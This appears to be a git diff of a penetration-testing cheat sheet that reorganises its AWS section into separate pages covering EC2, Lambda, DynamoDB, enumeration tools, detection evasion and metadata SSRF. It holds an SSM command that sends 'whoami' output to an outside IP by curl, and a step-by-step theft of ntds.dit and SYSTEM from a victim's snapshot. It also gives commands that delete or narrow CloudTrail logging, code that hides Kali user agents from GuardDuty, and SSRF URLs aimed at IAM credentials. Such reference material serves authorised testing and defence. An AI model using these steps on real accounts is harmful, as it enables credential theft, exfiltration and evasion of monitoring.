15:58:26,850 - 21345 - [INFO] -- cloudformation.list_stack_sets() worked! -2019-05-10 15:58:26,982 - 21345 - [INFO] -- directconnect.describe_locations() worked! -2019-05-10 15:58:27,021 - 21345 - [INFO] -- gamelift.describe_matchmaking_rule_sets() worked! -2019-05-10 15:58:27,311 - 21345 - [INFO] -- sqs.list_queues() worked! -``` - -## AWS - Mount EBS volume to EC2 Linux - -:warning: EBS snapshots are block-level incremental, which means that every snapshot only copies the blocks (or areas) in the volume that had been changed since the last snapshot. To restore your data, you need to create a new EBS volume from one of your EBS snapshots. The new volume will be a duplicate of the initial EBS volume on which the snapshot was taken. - -1. Head over to EC2 –> Volumes and create a new volume of your preferred size and type. -2. Select the created volume, right click and select the "attach volume" option. -3. Select the instance from the instance text box as shown below : `attach ebs volume` -```powershell -aws ec2 create-volume –snapshot-id snapshot_id --availability-zone zone -aws ec2 attach-volume –-volume-id volume_id –-instance-id instance_id --device device -``` -4. Now, login to your ec2 instance and list the available disks using the following command : `lsblk` -5. Check if the volume has any data using the following command : `sudo file -s /dev/xvdf` -6. Format the volume to ext4 filesystem using the following command : `sudo mkfs -t ext4 /dev/xvdf` -7. Create a directory of your choice to mount our new ext4 volume. I am using the name “newvolume” : `sudo mkdir /newvolume` -8. Mount the volume to "newvolume" directory using the following command : `sudo mount /dev/xvdf /newvolume/` -9. cd into newvolume directory and check the disk space for confirming the volume mount : `cd /newvolume; df -h .` - - -## AWS - Copy EC2 using AMI Image - -First you need to extract data about the current instances and their AMI/security groups/subnet : `aws ec2 describe-images --region eu-west-1` - -```powershell -# create a new image for the instance-id -$ aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1 - -# add key to AWS -$ aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1 - -# create ec2 using the previously created AMI, use the same security group and subnet to connect easily. -$ aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1 - -# now you can check the instance -aws ec2 describe-instances --instance-ids i-0546910a0c18725a1 - -# If needed : edit groups -aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "sg-6d0d7f01" --region eu-west-1 - -# be a good guy, clean our instance to avoid any useless cost -aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1 -aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1 -``` - -## AWS - Instance Connect - Push an SSH key to EC2 instance - -```powershell -# https://aws.amazon.com/fr/blogs/compute/new-using-amazon-ec2-instance-connect-for-ssh-access-to-your-ec2-instances/ -$ aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}" -$ aws ec2-instance-connect send-ssh-public-key --region us-east-1 --instance-id INSTANCE --availability-zone us-east-1d --instance-os-user ubuntu --ssh-public-key file://shortkey.pub --profile uploadcreds -``` - -## AWS - Lambda - Extract function's code - -```powershell -# https://blog.appsecco.com/getting-shell-and-data-access-in-aws-by-chaining-vulnerabilities-7630fa57c7ed -$ aws lambda list-functions --profile uploadcreds -$ aws lambda get-function --function-name "LAMBDA-NAME-HERE-FROM-PREVIOUS-QUERY" --query 'Code.Location' --profile uploadcreds -$ wget -O lambda-function.zip url-from-previous-query --profile uploadcreds -``` - -## AWS - SSM - Command execution - -:warning: The ssm-user account is not removed from the system when SSM Agent is uninstalled. - -SSM Agent is preinstalled, by default, on the following Amazon Machine Images (AMIs): -* Windows Server 2008-2012 R2 AMIs published in November 2016 or later -* Windows Server 2016 and 2019 -* Amazon Linux -* Amazon Linux 2 -* Ubuntu Server 16.04 -* Ubuntu Server 18.04 -* Amazon ECS-Optimized - -```powershell -$ aws ssm describe-instance-information --profile stolencreds --region eu-west-1 -$ aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds -$ aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds - -e.g: -$ aws ssm send-command --instance-ids "i-05b████████adaa" --document-name "AWS-RunShellScript" --comment "whoami" --parameters commands='curl 162.243.███.███:8080/`whoami`' --output text --region=us-east-1 -``` ## AWS - Golden SAML Attack @@ -632,138 +140,6 @@ $ python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012 ``` -## AWS - Shadow Copy attack - -Prerequisite: -* EC2:CreateSnapshot -* CloudCopy - https://github.com/Static-Flow/CloudCopy - -1. Load AWS CLI with Victim Credentials that have at least CreateSnapshot permissions -2. Run `"Describe-Instances"` and show in list for attacker to select -3. Run `"Create-Snapshot"` on volume of selected instance -4. Run `"modify-snapshot-attribute"` on new snapshot to set `"createVolumePermission"` to attacker AWS Account -5. Load AWS CLI with Attacker Credentials -6. Run `"run-instance"` command to create new linux ec2 with our stolen snapshot -7. Ssh run `"sudo mkdir /windows"` -8. Ssh run `"sudo mount /dev/xvdf1 /windows/"` -9. Ssh run `"sudo cp /windows/Windows/NTDS/ntds.dit /home/ec2-user"` -10. Ssh run `"sudo cp /windows/Windows/System32/config/SYSTEM /home/ec2-user"` -11. Ssh run `"sudo chown ec2-user:ec2-user /home/ec2-user/*"` -12. SFTP get `"/home/ec2-user/SYSTEM ./SYSTEM"` -13. SFTP get `"/home/ec2-user/ntds.dit ./ntds.dit"` -14. locally run `"secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets'`, expects secretsdump to be on path - -## Disable CloudTrail - -```powershell -$ aws cloudtrail delete-trail --name cloudgoat_trail --profile administrator -``` - -Disable monitoring of events from global services - -```powershell -$ aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event -``` - -Disable Cloud Trail on specific regions - -```powershell -$ aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event --no-is-multi-region --region=eu-west -``` - -## Cover tracks by obfuscating Cloudtrail logs and Guard Duty - -:warning: When using awscli on Kali Linux, Pentoo and Parrot Linux, a log is generated based on the user-agent. - -Pacu bypass this problem by defining a custom User-Agent (https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu.py#L1473) - -```python -boto3_session = boto3.session.Session() -ua = boto3_session._session.user_agent() -if 'kali' in ua.lower() or 'parrot' in ua.lower() or 'pentoo' in ua.lower(): # If the local OS is Kali/Parrot/Pentoo Linux - # GuardDuty triggers a finding around API calls made from Kali Linux, so let's avoid that... - self.print('Detected environment as one of Kali/Parrot/Pentoo Linux. Modifying user agent to hide that from GuardDuty...') -``` - -## DynamoDB -> Amazon DynamoDB is a key-value and document database that delivers single-digit millisecond performance at any scale. It's a fully managed, multi-region, multi-active, durable database with built-in security, backup and restore, and in-memory caching for internet-scale applications. DynamoDB can handle more than 10 trillion requests per day and can support peaks of more than 20 million requests per second. - -* list tables -```bash -$ aws --endpoint-url http://s3.bucket.htb dynamodb list-tables - -{ - "TableNames": [ - "users" - ] -} -``` - -* enumerate table content -```bash -$ aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users | jq -r '.Items[]' - -{ - "password": { - "S": "Management@#1@#" - }, - "username": { - "S": "Mgmt" - } -} -``` - -## Security checks - -Security checks from [DenizParlak/Zeus: AWS Auditing & Hardening Tool](https://github.com/DenizParlak/Zeus) - -* Identity and Access Management - * Avoid the use of the "root" account - * Ensure multi-factor authentication (MFA) is enabled for all IAM users that have a console password - * Ensure credentials unused for 90 days or greater are disabled - * Ensure access keys are rotated every 90 days or less - * Ensure IAM password policy requires at least one uppercase letter - * Ensure IAM password policy requires at least one lowercase letter - * Ensure IAM password policy requires at least one symbol - * Ensure IAM password policy requires at least one number - * Ensure IAM password policy requires minimum length of 14 or greater - * Ensure no root account access key exists - * Ensure MFA is enabled for the "root" account - * Ensure security questions are registered in the AWS account - * Ensure IAM policies are attached only to groups or role - * Enable detailed billing - * Maintain current contact details - * Ensure security contact information is registered - * Ensure IAM instance roles are used for AWS resource access from instances -* Logging - * Ensure CloudTrail is enabled in all regions - * Ensure CloudTrail log file validation is enabled - * Ensure the S3 bucket CloudTrail logs to is not publicly accessible - * Ensure CloudTrail trails are integrated with CloudWatch Logs - * Ensure AWS Config is enabled in all regions - * Ensure S3 bucket access logging is enabled on the CloudTrail S3 bucket - * Ensure CloudTrail logs are encrypted at rest using KMS CMKs - * Ensure rotation for customer created CMKs is enabled -* Networking - * Ensure no security groups allow ingress from 0.0.0.0/0 to port 22 - * Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389 - * Ensure VPC flow logging is enabled in all VPC - * Ensure the default security group of every VPC restricts all traffic -* Monitoring - * Ensure a log metric filter and alarm exist for unauthorized API calls - * Ensure a log metric filter and alarm exist for Management Consolesign-in without MFA - * Ensure a log metric filter and alarm exist for usage of "root" account - * Ensure a log metric filter and alarm exist for IAM policy changes - * Ensure a log metric filter and alarm exist for CloudTrail configuration changes - * Ensure a log metric filter and alarm exist for AWS Management Console authentication failures - * Ensure a log metric filter and alarm exist for disabling or scheduled deletion of customer created CMKs - * Ensure a log metric filter and alarm exist for S3 bucket policy changes - * Ensure a log metric filter and alarm exist for AWS Config configuration changes - * Ensure a log metric filter and alarm exist for security group changes - * Ensure a log metric filter and alarm exist for changes to NetworkAccess Control Lists (NACL) - * Ensure a log metric filter and alarm exist for changes to network gateways - * Ensure a log metric filter and alarm exist for route table changes - * Ensure a log metric filter and alarm exist for VPC changes ## AWSome Pentesting Cheatsheet @@ -2391,20 +1767,14 @@ aws ec2 describe-instances --filters "Name=subnet-id,Values=ID" ## References -* [An introduction to penetration testing AWS - Akimbocore](https://akimbocore.com/article/introduction-to-penetration-testing-aws/) * [Cloud Shadow Admin Threat 10 Permissions Protect - CyberArk](https://www.cyberark.com/threat-research-blog/cloud-shadow-admin-threat-10-permissions-protect/) * [My arsenal of AWS Security tools - toniblyx](https://github.com/toniblyx/my-arsenal-of-aws-security-tools) * [AWS Privilege Escalation method mitigation - RhinoSecurityLabs](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) * [AWS CLI Cheatsheet - apolloclark](https://gist.github.com/apolloclark/b3f60c1f68aa972d324b) * [Pacu Open source AWS Exploitation framework - RhinoSecurityLabs](https://rhinosecuritylabs.com/aws/pacu-open-source-aws-exploitation-framework/) * [PACU Spencer Gietzen - 30 juil. 2018](https://www.youtube.com/watch?v=XfetW1Vqybw&feature=youtu.be&list=PLBID4NiuWSmfdWCmYGDQtlPABFHN7HyD5) -* [Cloud security instance metadata - PumaScan](https://pumascan.com/resources/cloud-security-instance-metadata/) * [Privilege escalation in the Cloud: From SSRF to Global Account Administrator - Maxime Leblanc - Sep 1, 2018](https://medium.com/poka-techblog/privilege-escalation-in-the-cloud-from-ssrf-to-global-account-administrator-fd943cf5a2f6) * [AWS - Cheatsheet - @Magnussen](https://www.magnussen.funcmylife.fr/article_35) -* [HOW I HACKED A WHOLE EC2 NETWORK DURING A PENETRATION TEST - by Federico Fernandez](https://www.secsignal.org/en/news/how-i-hacked-a-whole-ec2-network-during-a-penetration-test/) -* [How to Attach and Mount an EBS volume to EC2 Linux Instance - AUGUST 17, 2016](https://devopscube.com/mount-ebs-volume-ec2-instance/) * [Getting shell and data access in AWS by chaining vulnerabilities - Riyaz Walikar - Aug 29, 2019 ](https://blog.appsecco.com/getting-shell-and-data-access-in-aws-by-chaining-vulnerabilities-7630fa57c7ed) * [Getting started with Version 2 of AWS EC2 Instance Metadata service (IMDSv2) - Sunesh Govindaraj - Nov 25, 2019](https://blog.appsecco.com/getting-started-with-version-2-of-aws-ec2-instance-metadata-service-imdsv2-2ad03a1f3650) -* [Gaining AWS Console Access via API Keys - Ian Williams - March 18th, 2020](https://blog.netspi.com/gaining-aws-console-access-via-api-keys/) -* [AWS API calls that return credentials - kmcquade](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a) -* [A short note on AWS KEY ID - Tal Be'ery - Oct 27, 2023](https://medium.com/@TalBeerySec/a-short-note-on-aws-key-id-f88cc4317489) +* [Gaining AWS Console Access via API Keys - Ian Williams - March 18th, 2020](https://blog.netspi.com/gaining-aws-console-access-via-api-keys/) \ No newline at end of file diff --git a/docs/cloud/aws/aws-access-token.md b/docs/cloud/aws/aws-access-token.md new file mode 100644 index 0000000..b7bc0cb --- /dev/null +++ b/docs/cloud/aws/aws-access-token.md @@ -0,0 +1,85 @@ +# AWS - Access Token & Secrets + +## URL Services + +| Service | URL | +|--------------|-----------------------| +| s3 | https://{user_provided}.s3.amazonaws.com | +| cloudfront | https://{random_id}.cloudfront.net | +| ec2 | ec2-{ip-seperated}.compute-1.amazonaws.com | +| es | https://{user_provided}-{random_id}.{region}.es.amazonaws.com | +| elb | http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443 | +| elbv2 | https://{user_provided}-{random_id}.{region}.elb.amazonaws.com | +| rds | mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306 | +| rds | postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432 | +| route 53 | {user_provided} | +| execute-api | https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided} | +| cloudsearch | https://doc-{user_provided}-{random_id}.{region}.cloudsearch.amazonaws.com | +| transfer | sftp://s-{random_id}.server.transfer.{region}.amazonaws.com | +| iot | mqtt://{random_id}.iot.{region}.amazonaws.com:8883 | +| iot | https://{random_id}.iot.{region}.amazonaws.com:8443 | +| iot | https://{random_id}.iot.{region}.amazonaws.com:443 | +| mq | https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162 | +| mq | ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617 | +| kafka | b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com | +| kafka | {user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com | +| cloud9 | https://{random_id}.vfs.cloud9.{region}.amazonaws.com | +| mediastore | https://{random_id}.data.mediastore.{region}.amazonaws.com | +| kinesisvideo | https://{random_id}.kinesisvideo.{region}.amazonaws.com | +| mediaconvert | https://{random_id}.mediaconvert.{region}.amazonaws.com | +| mediapackage | https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel | + + +## Access Key ID & Secret + +IAM uses the following prefixes to indicate what type of resource each unique ID applies to. The first four characters are the prefix that depends on the type of the key. + +| Prefix | Resource type | +|--------------|-------------------------| +| ABIA | AWS STS service bearer token | +| ACCA | Context-specific credential | +| AGPA | User group | +| AIDA | IAM user | +| AIPA | Amazon EC2 instance profile | +| AKIA | Access key | +| ANPA | Managed policy | +| ANVA | Version in a managed policy | +| APKA | Public key | +| AROA | Role | +| ASCA | Certificate | +| ASIA | Temporary (AWS STS) access key | + +The rest of the string is Base32 encoded and can be used to recover the account id. + +```py +import base64 +import binascii + +def AWSAccount_from_AWSKeyID(AWSKeyID): + + trimmed_AWSKeyID = AWSKeyID[4:] #remove KeyID prefix + x = base64.b32decode(trimmed_AWSKeyID) #base32 decode + y = x[0:6] + + z = int.from_bytes(y, byteorder='big', signed=False) + mask = int.from_bytes(binascii.unhexlify(b'7fffffffff80'), byteorder='big', signed=False) + + e = (z & mask)>>7 + return (e) + + +print ("account id:" + "{:012d}".format(AWSAccount_from_AWSKeyID("ASIAQNZGKIQY56JQ7WML"))) +``` + +## Regions + +* US Standard - http://s3.amazonaws.com +* Ireland - http://s3-eu-west-1.amazonaws.com +* Northern California - http://s3-us-west-1.amazonaws.com +* Singapore - http://s3-ap-southeast-1.amazonaws.com +* Tokyo - http://s3-ap-northeast-1.amazonaws.com + + +## References + +* [A short note on AWS KEY ID - Tal Be'ery - Oct 27, 2023](https://medium.com/@TalBeerySec/a-short-note-on-aws-key-id-f88cc4317489) diff --git a/docs/cloud/aws/aws-cognito.md b/docs/cloud/aws/aws-cognito.md new file mode 100644 index 0000000..25064b4 --- /dev/null +++ b/docs/cloud/aws/aws-cognito.md @@ -0,0 +1,17 @@ +# AWS - Cognito + +* [Cognito Scanner](https://github.com/padok-team/cognito-scanner) - A CLI tool for executing attacks on cognito such as *Unwanted account creation*, *Account Oracle* and *Identity Pool escalation*. + ```bash + # Installation + $ pip install cognito-scanner + # Usage + $ cognito-scanner --help + # Get information about how to use the unwanted account creation script + $ cognito-scanner account-creation --help + # For more details go to https://github.com/padok-team/cognito-scanner + ``` + + +## References + +* []() \ No newline at end of file diff --git a/docs/cloud/aws/aws-dynamodb.md b/docs/cloud/aws/aws-dynamodb.md new file mode 100644 index 0000000..50934f8 --- /dev/null +++ b/docs/cloud/aws/aws-dynamodb.md @@ -0,0 +1,36 @@ +# AWS - DynamoDB + +> Amazon DynamoDB is a key-value and document database that delivers single-digit millisecond performance at any scale. It's a fully managed, multi-region, multi-active, durable database with built-in security, backup and restore, and in-memory caching for internet-scale applications. DynamoDB can handle more than 10 trillion requests per day and can support peaks of more than 20 million requests per second. + + +## List Tables + +```bash +$ aws --endpoint-url http://s3.bucket.htb dynamodb list-tables + +{ + "TableNames": [ + "users" + ] +} +``` + +## Enumerate Table Content + +```bash +$ aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users | jq -r '.Items[]' + +{ + "password": { + "S": "Management@#1@#" + }, + "username": { + "S": "Mgmt" + } +} +``` + + +## References + +* []() \ No newline at end of file diff --git a/docs/cloud/aws/aws-ec2.md b/docs/cloud/aws/aws-ec2.md new file mode 100644 index 0000000..7d0289b --- /dev/null +++ b/docs/cloud/aws/aws-ec2.md @@ -0,0 +1,89 @@ +# AWS - EC2 + +* [dufflebag](https://labs.bishopfox.com/dufflebag) - Find secrets that are accidentally exposed via Amazon EBS's "public" mode + + +## Copy EC2 using AMI Image + +First you need to extract data about the current instances and their AMI/security groups/subnet : `aws ec2 describe-images --region eu-west-1` + +```powershell +# create a new image for the instance-id +$ aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1 + +# add key to AWS +$ aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1 + +# create ec2 using the previously created AMI, use the same security group and subnet to connect easily. +$ aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1 + +# now you can check the instance +aws ec2 describe-instances --instance-ids i-0546910a0c18725a1 + +# If needed : edit groups +aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "sg-6d0d7f01" --region eu-west-1 + +# be a good guy, clean our instance to avoid any useless cost +aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1 +aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1 +``` + + +## Mount EBS volume to EC2 Linux + +:warning: EBS snapshots are block-level incremental, which means that every snapshot only copies the blocks (or areas) in the volume that had been changed since the last snapshot. To restore your data, you need to create a new EBS volume from one of your EBS snapshots. The new volume will be a duplicate of the initial EBS volume on which the snapshot was taken. + +1. Head over to EC2 –> Volumes and create a new volume of your preferred size and type. +2. Select the created volume, right click and select the "attach volume" option. +3. Select the instance from the instance text box as shown below : `attach ebs volume` + ```powershell + aws ec2 create-volume –snapshot-id snapshot_id --availability-zone zone + aws ec2 attach-volume –-volume-id volume_id –-instance-id instance_id --device device + ``` +4. Now, login to your ec2 instance and list the available disks using the following command : `lsblk` +5. Check if the volume has any data using the following command : `sudo file -s /dev/xvdf` +6. Format the volume to ext4 filesystem using the following command : `sudo mkfs -t ext4 /dev/xvdf` +7. Create a directory of your choice to mount our new ext4 volume. I am using the name “newvolume” : `sudo mkdir /newvolume` +8. Mount the volume to "newvolume" directory using the following command : `sudo mount /dev/xvdf /newvolume/` +9. cd into newvolume directory and check the disk space for confirming the volume mount : `cd /newvolume; df -h .` + + +## Shadow Copy attack + +**Requirements**: + +* EC2:CreateSnapshot +* [Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) + +**Exploit**: + +1. Load AWS CLI with Victim Credentials that have at least CreateSnapshot permissions +2. Run `"Describe-Instances"` and show in list for attacker to select +3. Run `"Create-Snapshot"` on volume of selected instance +4. Run `"modify-snapshot-attribute"` on new snapshot to set `"createVolumePermission"` to attacker AWS Account +5. Load AWS CLI with Attacker Credentials +6. Run `"run-instance"` command to create new linux ec2 with our stolen snapshot +7. Ssh run `"sudo mkdir /windows"` +8. Ssh run `"sudo mount /dev/xvdf1 /windows/"` +9. Ssh run `"sudo cp /windows/Windows/NTDS/ntds.dit /home/ec2-user"` +10. Ssh run `"sudo cp /windows/Windows/System32/config/SYSTEM /home/ec2-user"` +11. Ssh run `"sudo chown ec2-user:ec2-user /home/ec2-user/*"` +12. SFTP get `"/home/ec2-user/SYSTEM ./SYSTEM"` +13. SFTP get `"/home/ec2-user/ntds.dit ./ntds.dit"` +14. locally run `"secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets'`, expects secretsdump to be on path + + +## Instance Connect + +Push an SSH key to EC2 instance + +```powershell +# https://aws.amazon.com/fr/blogs/compute/new-using-amazon-ec2-instance-connect-for-ssh-access-to-your-ec2-instances/ +$ aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}" +$ aws ec2-instance-connect send-ssh-public-key --region us-east-1 --instance-id INSTANCE --availability-zone us-east-1d --instance-os-user ubuntu --ssh-public-key file://shortkey.pub --profile uploadcreds +``` + + +## References + +* [How to Attach and Mount an EBS volume to EC2 Linux Instance - AUGUST 17, 2016](https://devopscube.com/mount-ebs-volume-ec2-instance/) \ No newline at end of file diff --git a/docs/cloud/aws/aws-enumeration.md b/docs/cloud/aws/aws-enumeration.md new file mode 100644 index 0000000..3d21a8f --- /dev/null +++ b/docs/cloud/aws/aws-enumeration.md @@ -0,0 +1,117 @@ +# AWS - Enumerate + +## Collectors + +* [nccgroup/ScoutSuite](https://github.com/nccgroup/ScoutSuite/wiki) - Multi-Cloud Security Auditing Tool + ```powershell + $ python scout.py PROVIDER --help + # The --session-token is optional and only used for temporary credentials (i.e. role assumption). + $ python scout.py aws --access-keys --access-key-id --secret-access-key --session-token + $ python scout.py azure --cli + ``` + +* [RhinoSecurityLabs/pacu](https://github.com/RhinoSecurityLabs/pacu) - Exploit configuration flaws within an AWS environment using an extensible collection of modules with a diverse feature-set + ```powershell + $ bash install.sh + $ python3 pacu.py + set_keys/swap_keys + run [--keyword-arguments] + run --regions eu-west-1,us-west-1 + ``` + +* [salesforce/cloudsplaining](https://github.com/salesforce/cloudsplaining) - An AWS IAM Security Assessment tool that identifies violations of least privilege and generates a risk-prioritized report + ```powershell + $ pip3 install --user cloudsplaining + $ cloudsplaining download --profile myawsprofile + $ cloudsplaining scan --input-file default.json + ``` + +* [duo-labs/cloudmapper](https://github.com/duo-labs/cloudmapper) - CloudMapper helps you analyze your Amazon Web Services (AWS) environments + ```powershell + sudo apt-get install autoconf automake libtool python3.7-dev python3-tk jq awscli build-essential + pipenv install --skip-lock + pipenv shell + report: Generate HTML report. Includes summary of the accounts and audit findings. + iam_report: Generate HTML report for the IAM information of an account. + audit: Check for potential misconfigurations. + collect: Collect metadata about an account. + find_admins: Look at IAM policies to identify admin users and roles, or principals with specific privileges + ``` + +* [cyberark/SkyArk](https://github.com/cyberark/SkyArk) - Discover the most privileged users in the scanned AWS environment, including the AWS Shadow Admins + ```powershell + $ powershell -ExecutionPolicy Bypass -NoProfile + PS C> Import-Module .\SkyArk.ps1 -force + PS C> Start-AWStealth + PS C> Scan-AWShadowAdmins + ``` + +* [BishopFox/CloudFox](https://github.com/BishopFox/CloudFox/) - Automating situational awareness for cloud penetration tests. Designed for white box enumeration (SecurityAudit/ReadOnly type permission), but can be used for black box (found credentials) as well. + ```ps1 + cloudfox aws --profile [profile-name] all-checks + ``` + +* [toniblyx/Prowler](https://github.com/toniblyx/prowler) - AWS security best practices assessments, audits, incident response, continuous monitoring, hardening and forensics readiness. It follows guidelines of the CIS Amazon Web Services Foundations Benchmark and DOZENS of additional checks including GDPR and HIPAA (+100). + ```powershell + $ pip install awscli ansi2html detect-secrets + $ sudo apt install jq + $ ./prowler -E check42,check43 + $ ./prowler -p custom-profile -r us-east-1 -c check11 + $ ./prowler -A 123456789012 -R ProwlerRole + ``` + +* [nccgroup/PMapper](https://github.com/nccgroup/PMapper) - A tool for quickly evaluating IAM permissions in AWS + ```powershell + pip install principalmapper + pmapper graph --create + pmapper visualize --filetype png + pmapper analysis --output-type text + + # Determine if PowerUser can escalate privileges + pmapper query "preset privesc user/PowerUser" + pmapper argquery --principal user/PowerUser --preset privesc + + # Find all principals that can escalate privileges + pmapper query "preset privesc *" + pmapper argquery --principal '*' --preset privesc + + # Find all principals that PowerUser can access + pmapper query "preset connected user/PowerUser *" + pmapper argquery --principal user/PowerUser --resource '*' --preset connected + + # Find all principals that can access PowerUser + pmapper query "preset connected * user/PowerUser" + pmapper argquery --principal '*' --resource user/PowerUser --preset connected + ``` + + +## AWS - Enumerate IAM permissions + +Enumerate the permissions associated with AWS credential set with [andresriancho/enumerate-iam](https://github.com/andresriancho/enumerate-iam) + +```powershell +git clone git@github.com:andresriancho/enumerate-iam.git +pip install -r requirements.txt +./enumerate-iam.py --access-key AKIA... --secret-key StF0q... +2019-05-10 15:57:58,447 - 21345 - [INFO] Starting permission enumeration for access-key-id "AKIA..." +2019-05-10 15:58:01,532 - 21345 - [INFO] Run for the hills, get_account_authorization_details worked! +2019-05-10 15:58:01,537 - 21345 - [INFO] -- { + "RoleDetailList": [ + { + "Tags": [], + "AssumeRolePolicyDocument": { + "Version": "2008-10-17", + "Statement": [ + { +... +2019-05-10 15:58:26,709 - 21345 - [INFO] -- gamelift.list_builds() worked! +2019-05-10 15:58:26,850 - 21345 - [INFO] -- cloudformation.list_stack_sets() worked! +2019-05-10 15:58:26,982 - 21345 - [INFO] -- directconnect.describe_locations() worked! +2019-05-10 15:58:27,021 - 21345 - [INFO] -- gamelift.describe_matchmaking_rule_sets() worked! +2019-05-10 15:58:27,311 - 21345 - [INFO] -- sqs.list_queues() worked! +``` + + +## References + +* [An introduction to penetration testing AWS - Akimbocore - HollyGraceful - 06 August 2021](https://akimbocore.com/article/introduction-to-penetration-testing-aws/) \ No newline at end of file diff --git a/docs/cloud/aws/aws-ioc-detection.md b/docs/cloud/aws/aws-ioc-detection.md new file mode 100644 index 0000000..1131ef4 --- /dev/null +++ b/docs/cloud/aws/aws-ioc-detection.md @@ -0,0 +1,38 @@ +# AWS - IOC & Detections + +## CloudTrail + +### Disable CloudTrail + +```powershell +$ aws cloudtrail delete-trail --name cloudgoat_trail --profile administrator +``` + +Disable monitoring of events from global services + +```powershell +$ aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event +``` + +Disable Cloud Trail on specific regions + +```powershell +$ aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event --no-is-multi-region --region=eu-west +``` + + +## GuardDuty + +### OS User Agent + +:warning: When using awscli on Kali Linux, Pentoo and Parrot Linux, a log is generated based on the user-agent. + +Pacu bypass this problem by defining a custom User-Agent: [pacu.py#L1473](https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu.py#L1473) + +```python +boto3_session = boto3.session.Session() +ua = boto3_session._session.user_agent() +if 'kali' in ua.lower() or 'parrot' in ua.lower() or 'pentoo' in ua.lower(): # If the local OS is Kali/Parrot/Pentoo Linux + # GuardDuty triggers a finding around API calls made from Kali Linux, so let's avoid that... + self.print('Detected environment as one of Kali/Parrot/Pentoo Linux. Modifying user agent to hide that from GuardDuty...') +``` diff --git a/docs/cloud/aws/aws-lambda.md b/docs/cloud/aws/aws-lambda.md new file mode 100644 index 0000000..b923c7e --- /dev/null +++ b/docs/cloud/aws/aws-lambda.md @@ -0,0 +1,15 @@ +# AWS - Lambda + + +## Extract function's code + +```powershell +aws lambda list-functions --profile uploadcreds +aws lambda get-function --function-name "LAMBDA-NAME-HERE-FROM-PREVIOUS-QUERY" --query 'Code.Location' --profile uploadcreds +wget -O lambda-function.zip url-from-previous-query --profile uploadcreds +``` + + +## References + +* [Getting shell and data access in AWS by chaining vulnerabilities - Appsecco - Riyaz Walikar - Aug 29, 2019](https://blog.appsecco.com/getting-shell-and-data-access-in-aws-by-chaining-vulnerabilities-7630fa57c7ed) \ No newline at end of file diff --git a/docs/cloud/aws/aws-metadata.md b/docs/cloud/aws/aws-metadata.md new file mode 100644 index 0000000..83982b5 --- /dev/null +++ b/docs/cloud/aws/aws-metadata.md @@ -0,0 +1,103 @@ +# AWS - Metadata SSRF + +> AWS released additional security defences against the attack. + +:warning: Only working with IMDSv1. +Enabling IMDSv2 : `aws ec2 modify-instance-metadata-options --instance-id --profile --http-endpoint enabled --http-token required`. + +In order to use IMDSv2 you must provide a token. + +```powershell +export TOKEN=`curl -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" "http://169.254.169.254/latest/api/token"` +curl -H "X-aws-ec2-metadata-token:$TOKEN" -v "http://169.254.169.254/latest/meta-data" +``` + + +## Method for Elastic Cloud Compute (EC2) + +Example : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/Awesome-WAF-Role/ + +1. Access the IAM : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/ + ```powershell + ami-id + ami-launch-index + ami-manifest-path + block-device-mapping/ + events/ + hostname + 